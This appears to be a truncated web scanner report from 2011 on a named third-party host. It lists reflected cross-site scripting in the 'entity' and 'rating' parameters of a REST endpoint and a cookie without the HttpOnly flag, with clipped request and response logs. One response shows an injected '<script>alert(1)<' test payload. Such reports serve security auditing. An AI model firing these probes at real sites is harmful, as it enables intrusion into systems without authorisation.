1. Cross-site scripting (reflected)
1.1. http://b2c-wsinsight.crowdfactory.com/rest/v1/entity/get [entity parameter]
1.2. http://b2c-wsinsight.crowdfactory.com/rest/v1/entity/get [rating parameter]
3. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://b2c-wsinsight |
Path: | /rest/v1/entity/get |
GET /rest/v1/entity/get Host: b2c-wsinsight.crowdf Proxy-Connection: keep-alive Referer: http://b2c-wsinsight Origin: http://b2c-wsinsight X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 15 Feb 2011 21:46:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Set-Cookie: JSESSIONID=24759C9CA Content-Length: 175 Content-Type: application/json;charset {"error_code": 19,"error_str": "Unable to find external entity ","error_detail": "'entity' 116218069b3e42<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b2c-wsinsight |
Path: | /rest/v1/entity/get |
GET /rest/v1/entity/get Host: b2c-wsinsight.crowdf Proxy-Connection: keep-alive Referer: http://b2c-wsinsight Origin: http://b2c-wsinsight X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 15 Feb 2011 21:44:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Set-Cookie: JSESSIONID=EF98A3EF0 Content-Length: 164 Content-Type: application/json;charset {"error_code": 98,"error_str": "Invalid parameter(s)","error |
Severity: | Medium |
Confidence: | Firm |
Host: | http://b2c-wsinsight |
Path: | /tracker/track.gif |
GET /tracker/track.gif?entity Host: b2c-wsinsight.crowdf Proxy-Connection: keep-alive Referer: http://www.prnewswire.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 15 Feb 2011 21:42:42 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 05 Apr 2010 22:22:58 GMT ETag: "40008a-2a-48384c56cb480" Accept-Ranges: bytes Content-Length: 42 Content-Type: image/gif GIF89a.............!..... |
Severity: | Low |
Confidence: | Firm |
Host: | http://b2c-wsinsight |
Path: | /rest/v1/entity/get |
POST /rest/v1/entity/get HTTP/1.1 Host: b2c-wsinsight.crowdf Proxy-Connection: keep-alive Referer: http://b2c-wsinsight Origin: http://b2c-wsinsight X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 204 rating=Widget007&cflog ...[SNIP]... |
HTTP/1.1 200 OK Date: Tue, 15 Feb 2011 21:42:43 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Set-Cookie: JSESSIONID=C7C7C4D57 Content-Length: 1305 Content-Type: application/json;charset {"ExternalEntity": {"uid": "116218069","category": 0,"title": " Akamai Unveils New Cloud Defense Solutions Designed to Protect Enterprises from Sophisticated... -- SAN FRANCISCO, Feb. 15, 2011 /PRNews ...[SNIP]... |